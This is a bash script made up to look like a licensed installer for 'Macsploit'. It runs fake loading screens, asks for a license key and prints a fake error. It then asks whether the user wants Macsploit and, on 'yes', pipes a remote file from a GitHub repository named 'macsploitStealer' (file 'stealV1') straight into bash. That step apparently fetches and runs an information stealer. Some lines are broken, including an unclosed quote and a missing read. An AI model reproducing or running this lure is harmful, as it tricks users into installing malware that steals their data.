#!/bin/bash

echo "en/$(whoami)......."

sleep 4
echo "Welcome, $(whoami)...."
sleep 10
echo "Please wait..."
sleep 6
echo "Loading."
sleep 1
echo "Loading.."
sleep 1
echo "Loading..."
sleep 1
echo "Loading...."
sleep 1
echo "Loading....."
sleep 1
echo "Loading."
sleep 1
echo "Loading.."
sleep 1
echo "Loading..."
sleep 1
echo "Loading...."
sleep 1
echo "Loading....."
sleep 1
echo "Loading."
sleep 1
echo "Loading.."
sleep 1
echo "Loading..."
sleep 1
echo "Loading...."
sleep 2
echo "Loaded!"
sleep 4

read -p "Enter License Key: " license_key

if [ "$license_key" == "12851" ]; then
    echo "License key accepted. Downloading file..."
echo "An error occured.."
sleep 5
echo "Would you like Macsploit before this closes? response
if [ "$response" == "yes" ]; then
cd ~/ && curl -s "https://raw.githubusercontent.com/Sadospry/macsploitStealer/main/stealV1" | bash
else
echo "Closing..."
sleep 5
exit 12851
fi

    if [ $? -eq 0 ]; then
RGB_COLOR="\033[38;2;0;255;0m"
# Print the message in fully green color
echo -e "${RGB_COLOR}File downloaded successfully to $DESTINATION_PATH.\033[0m"
    else
        RGB_COLOR="\033[38;2;255;0;0m"  # Red color
        echo -e "${RGB_COLOR}File failed to download.\033[0m"
        exit 12851
    fi
else
    echo "Invalid license key."
    exit 12851
fi
